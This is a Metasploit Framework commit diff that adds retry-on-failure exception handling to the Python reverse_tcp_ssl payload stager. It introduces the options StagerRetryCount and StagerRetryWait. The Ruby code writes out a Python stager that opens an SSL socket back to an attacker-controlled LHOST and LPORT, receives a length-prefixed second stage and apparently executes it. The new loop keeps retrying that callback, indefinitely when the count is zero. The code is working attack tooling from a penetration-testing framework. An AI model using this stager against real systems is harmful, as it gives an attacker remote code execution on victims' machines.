Land rapid7#8340, add exception handling for rev_tcp_ssl

zeroSteiner · zeroSteiner · commit 834e0eba953c · 2017-06-06T19:09:15.000-04:00
diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -15,14 +15,23 @@ module Payload::Python::ReverseTcpSsl
 
   include Msf::Payload::Python
   include Msf::Payload::Python::ReverseTcp
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
+        OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5])
+      ], self.class)
+  end
 
   #
   # Generate the first stage
   #
   def generate
     conf = {
       port:        datastore['LPORT'],
-      host:        datastore['LHOST']
+      host:        datastore['LHOST'],
+      retry_count: datastore['StagerRetryCount'],
+      retry_wait:  datastore['StagerRetryWait'],
     }
 
     generate_reverse_tcp_ssl(conf)
@@ -42,10 +51,29 @@ def supports_ssl?
 
   def generate_reverse_tcp_ssl(opts={})
     # Set up the socket
-    cmd  = "import ssl,socket,struct\n"
-    cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
-    cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-    cmd << "s=ssl.wrap_socket(so)\n"
+    cmd  = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
+    if opts[:retry_wait].blank? # do not retry at all (old style)
+      cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
+      cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+      cmd << "s=ssl.wrap_socket(so)\n"
+    else
+      if opts[:retry_count] > 0
+        cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
+      else
+        cmd << "while 1:\n"
+      end
+      cmd << "\ttry:\n"
+      cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
+      cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+      cmd << "\t\ts=ssl.wrap_socket(so)\n"
+      cmd << "\t\tbreak\n"
+      cmd << "\texcept:\n"
+      if opts[:retry_wait].to_i <= 0
+        cmd << "\t\tpass\n" # retry immediately
+      else
+        cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
+      end
+    end
     cmd << py_send_uuid if include_send_uuid
     cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
     cmd << "d=s.recv(l)\n"
diff --git a/modules/payloads/stagers/python/reverse_tcp_ssl.rb b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 378
+  CachedSize = 470
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcpSsl
